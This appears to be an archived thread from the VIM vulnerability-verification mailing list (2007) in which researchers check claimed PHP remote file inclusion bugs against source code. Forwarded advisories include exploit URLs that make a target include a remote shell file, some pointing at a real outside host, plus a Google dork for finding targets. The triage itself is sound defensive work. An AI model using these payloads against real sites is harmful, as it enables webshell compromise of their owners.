Ref: http://www.milw0rm.com/exploits/3267 In the Geeklog distribution, we have the following from Geeklog-2.x/system/libraries/Geeklog/MVCnPHP/BaseView.php: require $glConf['path_libraries'] . 'Geeklog/MVCnPHP/ViewInterface.php'; which is the first statement. However, this comes from some package called "MVCnPHP" which has some close relationship with Geeklog but is separate: http://freshmeat.net/projects/mvcnphp/ which says "MVCnPHP stands for Model-View-Controller in PHP. It is an implementation of the MVC design pattern for use in PHP applications." ... and downloading 3.0.0 of this MVCnPHP produces a BaseView.php which, upon removing spaces and CRLF inconsistencies, is exactly the same as that which is in Geeklog. So we can add this to our list of modules whose ease-of-integration makes opportunities for ease-of-exploitation. Whether the blame lies with Geeklog or MVCnPHP is not immediately clear. - Steve From str0ke at milw0rm.com Wed Feb 7 09:54:23 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 08:54:23 -0600 Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln. Message-ID: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com> line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php") line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php"); Not vulnerable. /str0ke -------------- next part -------------- ################################################################################################ # # Title : PhotoStand (plugins.php) Remote File Include Vuln. # Author : Gokhan # DownLoad : http://www.comscripts.com/jump.php?action=script&id=1864 # Contact : gokhankaya at hotmail.com | msn at bl4ster.net # # Vuln Code : includes/functions/plugins.php # # include($plugins_path . "plugins/" . $plugin ."/plugin.php"); # # Exploit : http://site/path/includes/functions/plugins.php?plugins_path=http://sh3ll # ################################################################################################ # # GreetZ: BLaCKWHITE, CanberX, LGMAN, HackerBox.Eu, str0ke # ################################################################################################# From str0ke at milw0rm.com Wed Feb 7 10:20:00 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 09:20:00 -0600 Subject: [VIM] true: agermenu Message-ID: <814b9d50702070720rc1c9af9n2f6161e7b1fb0d71@mail.gmail.com> line 26: include $rootdir."inc/agermenu.func.php"; /str0ke =============================================================== Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn =============================================================== URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz =============================================================== V.CODE: In : [path]/example/inc/top.inc.php include $rootdir."inc/agermenu.func.php"; =============================================================== Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt? =============================================================== From str0ke at milw0rm.com Wed Feb 7 10:27:28 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 09:27:28 -0600 Subject: [VIM] =?iso-8859-9?q?false=3A_Phpwebsite_1=2E0=2E0_File_=DDnclude?= =?iso-8859-9?q?_Vulnerability?= Message-ID: <814b9d50702070727k59783edbycc373895d8a8c9a2@mail.gmail.com> The error section pretty much explains it all. /str0ke -------------------------------------********************---------------------------------------------------------- #Title : Phpwebsite 1.0.0 {/inc/functions.php} File ?nclude Vulnerability #S.Page : phpwebsite.appstate.edu :) --------------------------------------*******************----------------------------------------------------------- [[Error]] $file = sprintf('Compat/Function/%s.php', $function); if ((@include_once $file) !== false) { return true; } } return false; } [[Error]] [[RFI]] http://[target]/[path]/inc/functions.php?file=[Shell] From str0ke at milw0rm.com Wed Feb 7 10:34:35 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 09:34:35 -0600 Subject: [VIM] false: OpenBiblio <= 0.5.2(localize.php) Remote File Include Vulnerabilities Message-ID: <814b9d50702070734q302d49c9pefe69f399c0e1d61@mail.gmail.com> The file only contains 1 class named Localize. /str0ke *Script : OpenBiblio <= version 0.5.2(localize.php) Remote File Include Vulnerabilities ******************************************************************************* *URL: * *http://sourceforge.net/project/showfiles.php?group_id=50071 ******************************************************************************* * *V.CODE: In : [path]/classes/localize.php * *include($localpath); * ******************************************************************************** * *Exploit: * *http://www.site.com/{scriptpath}/classes/localize.php?localpath={shellcode} From str0ke at milw0rm.com Wed Feb 7 11:19:41 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 10:19:41 -0600 Subject: [VIM] false: WebMatic 2.5 Remote File Include Vulnerability Message-ID: <814b9d50702070819l5e2a5deeic2e7f9085d5a65eb@mail.gmail.com> WebMatic 2.5 http://www.valarsoft.com/index.php?dpage=pagine&page=downloads&pagID=156&arg_downID=1&sub_downID=1&downID=11&SCARICA=si P_LIB is initialized. line 6: require("core/lib.php"); line 7: require($P_LIB."lib_chat.php"); core/lib.php line 8: $P_LIB="core/"; /str0ke -------------------------------------********************---------------------------------------------------------- #Title : WebMatic 2.5 Remote File Include Vulnerability #S.Page : php.arsivimiz.com/goster/504 :) # easyier link: --------------------------------------*******************----------------------------------------------------------- Error : require($P_LIB."lib_chat.php"); [[RFI]] http://[target]/[path]/chat.php?P_LIB=[Shell] Example : [Path]/chat.php?P_LIB=http://[path]/shell.txt [[/RFI]] From str0ke at milw0rm.com Wed Feb 7 12:18:54 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 11:18:54 -0600 Subject: [VIM] true: WebMatic 2.6 RFI Message-ID: <814b9d50702070918m3972ce9fk2f2c00be7eeec332@mail.gmail.com> Pretty much the first line is $P_LIB so it is vulnerable. /str0ke -------------------------------------********************---------------------------------------------------------- #Title : WebMatic 2.6 #Author : MadNet #Contact : MadNet[at]Hackertr[Dot]org #S.Page : www.valarsoft.com :) --------------------------------------*******************----------------------------------------------------------- Error1 : require($P_LIB."lib_album.php"); Error2 : require($P_INDEX."page_album.inc"); [[RFI]] http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell] http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell] ------------------------------------------------- Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' -- MadNet From Turkey & Cyber-Sabotger Orgeneral -- --Thanks Milw0rm --Milw0rm.com [2007-02-07] From coley at linus.mitre.org Wed Feb 7 12:50:14 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 12:50:14 -0500 (EST) Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln. In-Reply-To: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com> References: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com> Message-ID: On Wed, 7 Feb 2007, str0ke wrote: > line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php") > > line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php"); > > Not vulnerable. If $plugins_path or $plugin are attacker-controlled, then are they subject to ".." or "/abs/path" traversal attacks? - Steve From str0ke at milw0rm.com Wed Feb 7 13:28:35 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 12:28:35 -0600 Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln. In-Reply-To: References: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com> Message-ID: <814b9d50702071028v76b6735h791690efb714b209@mail.gmail.com> $open_plugins = opendir($plugins_path . "plugins/"); // Read plugins directory while ($plugin = readdir($open_plugins)){ ########################### the while loop would end if plugins_path isn't a directory. Which it seems is the only variable that you can play with :( /str0ke On 2/7/07, Steven M. Christey wrote: > > On Wed, 7 Feb 2007, str0ke wrote: > > > line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php") > > > > line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php"); > > > > Not vulnerable. > > If $plugins_path or $plugin are attacker-controlled, then are they subject > to ".." or "/abs/path" traversal attacks? > > - Steve > From str0ke at milw0rm.com Wed Feb 7 15:56:45 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 14:56:45 -0600 Subject: [VIM] false: Agermenu 0.03 Message-ID: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com> $rootdir is defined on the top line of index.php and the rest. /str0ke Name: Agermenu 0.03 - Remote File Include Vulnerability Script: http://www.chbs.dk/proj/agermenu/agermenu-0.03.tgz ***************** ERROR: index.php -> include $rootdir."inc/top.inc.php"; (line 4) index.php -> include $rootdir."inc/bottom.inc.php"; (line 24) about/contribute.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5) about/contribute.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 32) ************************************************************************************** about/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5) about/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 20) ************************************************************************************** about/using.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5 , 50) about/using.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 67, 78) ************************************************************************************** about/licenses/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5) about/licenses/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 30) ************************************************************************************** kvastmo/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5) kvastmo/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 39) ************************************************************************************** And more .. almost all files have the include $rootdir ;) for the rest download the script (above) ************************************************************************************** RFI: http://www.SITE.com/path/index.php?rootdir=[shell] http://www.SITE.com/path/about/contribute.php?rootdir=[shell] http://www.SITE.com/path/about/index.php?rootdir=[shell] http://www.SITE.com/path/about/using.php?rootdir=[shell] http://www.SITE.com/path/about/licenses/index.php?rootdir=[shell] http://www.SITE.com/path/kvastmo/index.php?rootdir=[shell] ************************************************************************************** From coley at mitre.org Wed Feb 7 16:07:36 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 16:07:36 -0500 (EST) Subject: [VIM] true: months-old CentiPaid absolute_path RFI Message-ID: <200702072107.l17L7adG007842@faron.mitre.org> Researcher: Kw3[R]Ln [ Romanian Security Team ] Ref: http://www.milw0rm.com/exploits/2555 first line is: include($absolute_path.'/centipaid/adodb/adodb.inc.php'); NOTE - this is a different vector than OSVDB:31638, which was disputed. - Steve From coley at linus.mitre.org Wed Feb 7 18:27:09 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 18:27:09 -0500 (EST) Subject: [VIM] false: Agermenu 0.03 In-Reply-To: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com> References: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com> Message-ID: FRSIRT:ADV-2007-0512 mentions 0.03 as vulnerable to rootdir in examples/inc/top.inc.php. This vector was published for 0.01 in http://www.milw0rm.com/exploits/3280, a different disclosure than what str0ke just mentioned. This looks legit for 0.03 too: examples/inc/top.inc.php [first mention] $sysvar_copyright_url=$rootdir."about/licenses/"; ... if (file_exists($rootdir."inc/agermenu.func.php")) { $agermenufuncfile=$rootdir."inc/agermenu.func.php"; } # The new default place (from version 0.03) for # the agermenu.func.php file if (file_exists($rootdir."agermenu/agermenu.func.php")) { $agermenufuncfile=$rootdir."agermenu/agermenu.func.php"; } # Only include if the agermenu.func.php file exists if (file_exists($agermenufuncfile)) { include $agermenufuncfile; - Steve From str0ke at milw0rm.com Wed Feb 7 20:53:19 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 19:53:19 -0600 Subject: [VIM] false: Agermenu 0.03 In-Reply-To: References: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com> Message-ID: <814b9d50702071753s40d720bay98c283f56197cd6f@mail.gmail.com> local inclusion looks good to go. if (file_exists($agermenufuncfile)) { include $agermenufuncfile; /str0ke On 2/7/07, Steven M. Christey wrote: > > FRSIRT:ADV-2007-0512 mentions 0.03 as vulnerable to rootdir in > examples/inc/top.inc.php. This vector was published for 0.01 in > http://www.milw0rm.com/exploits/3280, a different disclosure than what > str0ke just mentioned. > > This looks legit for 0.03 too: > > examples/inc/top.inc.php > > [first mention] > $sysvar_copyright_url=$rootdir."about/licenses/"; > > ... > > if (file_exists($rootdir."inc/agermenu.func.php")) { > $agermenufuncfile=$rootdir."inc/agermenu.func.php"; > } > > # The new default place (from version 0.03) for > # the agermenu.func.php file > if (file_exists($rootdir."agermenu/agermenu.func.php")) { > $agermenufuncfile=$rootdir."agermenu/agermenu.func.php"; > } > > # Only include if the agermenu.func.php file exists > if (file_exists($agermenufuncfile)) { > include $agermenufuncfile; > > > - Steve > From str0ke at milw0rm.com Wed Feb 7 21:20:16 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 7 Feb 2007 20:20:16 -0600 Subject: [VIM] true: Agermenu 0.03 Message-ID: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com> First line of code reads include($path_to_folder.'classes/class.phpmailer.php'); /str0ke ***************** Found by Denven * ***************** ***************** ***************** Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html ***************** Google Dork: "Powered by Maian Recipe v1.0" ***************** ERROR: classes/class_mail.inc.php : include($path_to_folder.'classes/class.phpmailer.php'); **************************************************************************** ********** RFI: http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell] **************************************************************************** ********** denven[at]gmail[dot]com From coley at linus.mitre.org Thu Feb 8 11:34:09 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 8 Feb 2007 11:34:09 -0500 (EST) Subject: [VIM] true: Agermenu 0.03 In-Reply-To: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com> References: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com> Message-ID: On Wed, 7 Feb 2007, str0ke wrote: > First line of code reads > > include($path_to_folder.'classes/class.phpmailer.php'); I assume in this case you meant Maian Recipe, not Agermenu :) - Steve > ***************** > Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html > ***************** > Google Dork: "Powered by Maian Recipe v1.0" > ***************** From str0ke at milw0rm.com Thu Feb 8 11:44:00 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 8 Feb 2007 10:44:00 -0600 Subject: [VIM] true: Agermenu 0.03 In-Reply-To: References: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com> Message-ID: <814b9d50702080844g481e1207g2de228737b0c8156@mail.gmail.com> Oops, he sent in the other vulnerability with Agermenu as the title. Missed that mistake. Maian Recipe v1.0 /str0ke On 2/8/07, Steven M. Christey wrote: > > On Wed, 7 Feb 2007, str0ke wrote: > > > First line of code reads > > > > include($path_to_folder.'classes/class.phpmailer.php'); > > > I assume in this case you meant Maian Recipe, not Agermenu :) > > - Steve > > > ***************** > > Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html > > ***************** > > Google Dork: "Powered by Maian Recipe v1.0" > > ***************** > From str0ke at milw0rm.com Thu Feb 8 11:49:36 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 8 Feb 2007 10:49:36 -0600 Subject: [VIM] false: News-Maniac Remote File Include Vulnerability Message-ID: <814b9d50702080849u4bf7d792le5f1226fa3a5bf24@mail.gmail.com> The file only contains defines and a class that is never used. /str0ke ############################################################## #News-Maniac Remote File Include Vulnerability #Download : http://sourceforge.net/projects/news-maniac/ #Bug: include($compile_path) ############################################################### # #Exploit # #[path]/smarty/Smarty.class.php?compile_path=[Evil Scrpits] # From str0ke at milw0rm.com Thu Feb 8 12:13:42 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 8 Feb 2007 11:13:42 -0600 Subject: [VIM] false: Tritanium Bulletin Board 2 version #2005-05-02-18-17-06 Remote File Inclusion Exploit Message-ID: <814b9d50702080913h23c67dcmabb89792288342e6@mail.gmail.com> Piece of the exploit code: =>$Path.'misc/update_tbb1/update_tbb1.php?LANGUAGE_PATH='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; First 3 lines of code. > require_once('startup.php'); > $LANGUAGE_PATH = 'languages/'.$CONFIG['standard_language']; > include($LANGUAGE_PATH.'/lng_main.php'); Seems there isn't a startup.php file in the update_tbb1 directory, which in newer versions of php would just die right after the first line. If you get passed the require line you could take over $CONFIG['standard_language']. Even local inclusion isn't possible without a languages folder existing in the current directory. So pretty much the script isn't vulnerable to a remote/local inclusion attack. /str0ke From coley at mitre.org Sun Feb 11 02:36:51 2007 From: coley at mitre.org (Steven M. Christey) Date: Sun, 11 Feb 2007 02:36:51 -0500 (EST) Subject: [VIM] FreeRADIUS dispute of CVE-2007-0080 Message-ID: <200702110736.l1B7apwM021640@faron.mitre.org> Received this via email. http://www.freeradius.org/security.html "2007.01.02 - SMB_Handle_Type SMB_Connect_Server. While the summary is superficially correct, and there is a stack overflow in rlm_smb, the issue is less problematic than it sounds... In summary, the issue is not remotely exploitable. It is exploitable by local administrators who have write access to the server configuration files. If an attacker can write to the server configuration files, they can configure the server to run arbitrary programs. Exploiting the server via a stack overflow would be unnecessary." The vendor mentions that some VDB's haven't updated their records yet. - Steve From coley at mitre.org Mon Feb 12 16:50:41 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 12 Feb 2007 16:50:41 -0500 (EST) Subject: [VIM] CVE dispute - old Somery team.php RFI Message-ID: <200702122150.l1CLofGO018782@faron.mitre.org> Researcher: SpC-x Ref: BID:18412, OSVDB:27662 Raw source: http://www.root-security.org/danger/Somery.txt (now 404) Alternate: http://packetstorm.linuxsecurity.com/0606-exploits/Somery.txt Claimed vectors: team.php?checkauth The original advisory provides enough context: # include("system/include.php"); # if ($checkauth) { ... # http://www.victim.com/Somery/team.php?checkauth=Command-Shell Obviously since $checkauth is in a conditional, RFI existence is highly suspicious. Just to be sure, I downloaded 0.4.4 and grepped for "checkauth" in the whole product, and it's only used in conditionals (when it's not being set to 1 or 0, that is). - Steve From str0ke at milw0rm.com Mon Feb 12 17:19:16 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 12 Feb 2007 16:19:16 -0600 Subject: [VIM] false: drakecms 0.3.2beta (header.php) Remote File Inclusion Vulnerability Message-ID: <814b9d50702121419h7ba90b28gbc21f9dfc07c5f58@mail.gmail.com> First line of code. Hi, The vulnerability is there... pValid simply verifies that the page you requested is the page being displayed, so I need to call my malware the same as status.php or any of the other files found to be linked inside the PHP. $p = $_REQUEST['p']; if( !$p ) $p="$cfg->defaultPage"; $p is not a valid page..."; } ?> -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com -------------- next part -------------- An embedded message was scrubbed... From: Sebastian Wolfgarten Subject: [Full-disclosure] Arbitrary file disclosure vulnerability in php rrd browser < 0.2.1 (prb) Date: Sun, 11 Feb 2007 17:19:09 +0100 Size: 5968 Url: http://www.attrition.org/pipermail/vim/attachments/20070213/dca05f8c/attachment.mht From noamr at beyondsecurity.com Tue Feb 13 05:08:48 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Tue, 13 Feb 2007 12:08:48 +0200 Subject: [VIM] true: Inertia News Remote File İnclude Message-ID: <200702131208.48908.noamr@beyondsecurity.com> Hi, It looks legit: require ("$inews_path/inertia_sql_class.php"); No tests done to the value. Product looks like abandon ware (http://www.brentc.com/inertianews/). ---------- Forwarded Message ---------- Subject: Inertia News Remote File İnclude Date: Monday 12 February 2007 22:55 From: crazy_king at eno7.org To: bugtraq at securityfocus.com Version : 0.02 beta Error : require ("$inews_path/inertia_sql_class.php"); Exploit : http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh ell.txt Eno7.Org - Crazy-King.ORg Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From str0ke at milw0rm.com Tue Feb 13 09:06:45 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 13 Feb 2007 08:06:45 -0600 Subject: [VIM] true: Inertia News Remote File İnclude In-Reply-To: <200702131208.48908.noamr@beyondsecurity.com> References: <200702131208.48908.noamr@beyondsecurity.com> Message-ID: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com> This was posted up on 12/21/2006. http://www.milw0rm.com/exploits/2976 /str0ke On 2/13/07, Noam Rathaus wrote: > Hi, > > It looks legit: > > > require ("$inews_path/inertia_sql_class.php"); > > > No tests done to the value. > > Product looks like abandon ware (http://www.brentc.com/inertianews/). > > ---------- Forwarded Message ---------- > > Subject: Inertia News Remote File İnclude > Date: Monday 12 February 2007 22:55 > From: crazy_king at eno7.org > To: bugtraq at securityfocus.com > > Version : > 0.02 beta > > Error : > require ("$inews_path/inertia_sql_class.php"); > > Exploit : > http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh > ell.txt > > Eno7.Org - Crazy-King.ORg > > Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim > > ------------------------------------------------------- > > -- > Noam Rathaus > CTO > 1616 Anderson Rd. > McLean, VA 22102 > Tel: 703.286.7725 extension 105 > Fax: 888.667.7740 > noamr at beyondsecurity.com > http://www.beyondsecurity.com > From ge at linuxbox.org Tue Feb 13 09:07:51 2007 From: ge at linuxbox.org (Gadi Evron) Date: Tue, 13 Feb 2007 08:07:51 -0600 (CST) Subject: [VIM] true: Inertia News Remote File İnclude In-Reply-To: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com> Message-ID: On Tue, 13 Feb 2007, str0ke wrote: > This was posted up on 12/21/2006. > > http://www.milw0rm.com/exploits/2976 Any guidelines you want us to follow then when we test stuff and share? > > /str0ke > > On 2/13/07, Noam Rathaus wrote: > > Hi, > > > > It looks legit: > > > > > > require ("$inews_path/inertia_sql_class.php"); > > > > > > No tests done to the value. > > > > Product looks like abandon ware (http://www.brentc.com/inertianews/). > > > > ---------- Forwarded Message ---------- > > > > Subject: Inertia News Remote File İnclude > > Date: Monday 12 February 2007 22:55 > > From: crazy_king at eno7.org > > To: bugtraq at securityfocus.com > > > > Version : > > 0.02 beta > > > > Error : > > require ("$inews_path/inertia_sql_class.php"); > > > > Exploit : > > http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh > > ell.txt > > > > Eno7.Org - Crazy-King.ORg > > > > Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim > > > > ------------------------------------------------------- > > > > -- > > Noam Rathaus > > CTO > > 1616 Anderson Rd. > > McLean, VA 22102 > > Tel: 703.286.7725 extension 105 > > Fax: 888.667.7740 > > noamr at beyondsecurity.com > > http://www.beyondsecurity.com > > > From str0ke at milw0rm.com Tue Feb 13 09:21:56 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 13 Feb 2007 08:21:56 -0600 Subject: [VIM] true: Inertia News Remote File İnclude In-Reply-To: References: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com> Message-ID: <814b9d50702130621p5c6fcac7m832923dd3efa8743@mail.gmail.com> On 2/13/07, Gadi Evron wrote: > On Tue, 13 Feb 2007, str0ke wrote: > > This was posted up on 12/21/2006. > > > > http://www.milw0rm.com/exploits/2976 > > Any guidelines you want us to follow then when we test stuff and share? Not on my side you guys rock, keep up the good work. /str0ke From str0ke at milw0rm.com Tue Feb 13 09:44:36 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 13 Feb 2007 08:44:36 -0600 Subject: [VIM] true: AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit Message-ID: <814b9d50702130644g6c81ce96o19e3d3f5181d80cf@mail.gmail.com> First line of code. include($Root_To_Script.'class.readdir.php'); /str0ke ################## AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit Script Page:http://contenator.ansatheus.de/ Script Download:http://www.ansatheus.de/_at_contenator/6_Download-Bereich/download/1_Contenator-Sourcen/milestone_Beispielprojekt.zip Test Page: http://www.xxx.de/_at_contenator/ http://www.xxx.de/_at_contenator/_admin/nav.php?Root_To_Script=http://www.gnlm.com.ar/images/images.txt? From str0ke at milw0rm.com Tue Feb 13 10:25:26 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 13 Feb 2007 09:25:26 -0600 Subject: [VIM] false: paNews 2.0b4 < = RFi Vulnerabilities Message-ID: <814b9d50702130725v12b826cdn56245088946880dc@mail.gmail.com> Below is the code. $base_dir = ""; $base_url = ""; if (!$IS_PANEWS) { $IS_PANEWS = 1; include_once($base_dir . "config.php"); include_once($base_dir . "includes/database.php"); include_once($base_dir . "includes/functions.php"); $mysql->connect(); extract($_GET); ###############################3 There are a few extract calls in multiple of the scripts that are used but the current one shouldn't be vulnerable. phpinfo disclosure placed in the code. Got to love it. if ($action == "login") { $done = $auth->login(); } else if ($action == "logoff") { $auth->logoff(); } else if (md5($action) == "8e31d9de70421ac6d33b50887b523a5b") { // This is for the phparena staff. It is simply for debugging purposes. // If you do not like the idea of this being here... Simply remove: // 8e31d9de70421ac6d33b50887b523a5b from above. phpinfo(); exit; } /str0ke ################################################################## #paNews 2.0b4 < = RFi Vulnerabilities # #Download : http://phparena.net/files/officialdloads/panews/panews_20b4.zip # #Script Name : paNews #V.Code in : [path]/viewnews.php # # # include_once($base_dir . "config.php"); # include_once($base_dir . "includes/database.php"); # include_once($base_dir . "includes/functions.php"); #Exploit : www.target.com/path/viewnews.php?base_dir=[shell] From heinbockel at mitre.org Tue Feb 13 10:29:03 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 13 Feb 2007 10:29:03 -0500 Subject: [VIM] Some bl4ck Advisories are site-specific Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0195F0C3@IMCSRV5.MITRE.ORG> Yesterday, the research bl4ck (Black Zero) posted several BUGTRAQ issues for XSS vulnerabilities. Some of these (maybe all) appear to be site-specific issues, including: BUGTRAQ:20070209 XSS in eWay BUGTRAQ:20070210 XSS in JBoss Portal BUGTRAQ:20070209 XSS in lighttpd I have verified that the lighttpd product is not vulnerable to XSS, and have not found any evidence supporting XSS flaws in the others. Anyone else have any luck? William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From heinbockel at mitre.org Tue Feb 13 10:32:47 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 13 Feb 2007 10:32:47 -0500 Subject: [VIM] Verified: dot in Miniwebsvr 0.0.6 Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0195F0C5@IMCSRV5.MITRE.ORG> Research: bl4ck BUGTRAQ:20070211 Miniwebsvr 0.0.6 - Directory traversal In src/server.c (lines 221-229): // Check for sub-root hacking, If found send a forbidden. if (strstr(filename,"../")!=NULL) { strlcat(inst->logbuffer," ;",SERVER_BUFFER_SIZE); setHeader_respval(inst,403); // Forbidden printHeader(inst,headeronly,Buffer,SEND_BUFFER_SIZE); // No need to read goto serverquit; } So only a directory traversal of .. will work. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at linus.mitre.org Tue Feb 13 13:26:54 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 13 Feb 2007 13:26:54 -0500 (EST) Subject: [VIM] true: Inertia News Remote File İnclude In-Reply-To: References: Message-ID: On Tue, 13 Feb 2007, Gadi Evron wrote: > On Tue, 13 Feb 2007, str0ke wrote: > > This was posted up on 12/21/2006. > > > > http://www.milw0rm.com/exploits/2976 > > Any guidelines you want us to follow then when we test stuff and share? I would think that as long as there's enough information to allow someone else to replicate your findings, that's sufficient. E.g. in this thread it was useful to know this was disclosed on milw0rm a while ago because we might be able to avoid creating a duplicate. - Steve From ge at linuxbox.org Tue Feb 13 14:55:32 2007 From: ge at linuxbox.org (Gadi Evron) Date: Tue, 13 Feb 2007 13:55:32 -0600 (CST) Subject: [VIM] true: Inertia News Remote File İnclude In-Reply-To: Message-ID: On Tue, 13 Feb 2007, Steven M. Christey wrote: > > On Tue, 13 Feb 2007, Gadi Evron wrote: > > > On Tue, 13 Feb 2007, str0ke wrote: > > > This was posted up on 12/21/2006. > > > > > > http://www.milw0rm.com/exploits/2976 > > > > Any guidelines you want us to follow then when we test stuff and share? > > I would think that as long as there's enough information to allow someone > else to replicate your findings, that's sufficient. E.g. in this thread > it was useful to know this was disclosed on milw0rm a while ago because we > might be able to avoid creating a duplicate. Gotcha. Thanks! > > - Steve > From str0ke at milw0rm.com Tue Feb 13 17:14:54 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 13 Feb 2007 16:14:54 -0600 Subject: [VIM] false: Tell A Friend Script 2.8 Remote File Include Vulnerability Message-ID: <814b9d50702131414w24d1af84x5db7207eb140e4cf@mail.gmail.com> The script template.ext.class.inc.php only contains a class that is never used. /str0ke -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Tell A Friend Script 2.8 Remote File Include Vulnerability * http://www.stadtaus.com/en/php_scripts/tell_a_friend_script/download_tell_a_friend_script.php -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= function set_include_path($path) { $this->include_path = $path; * 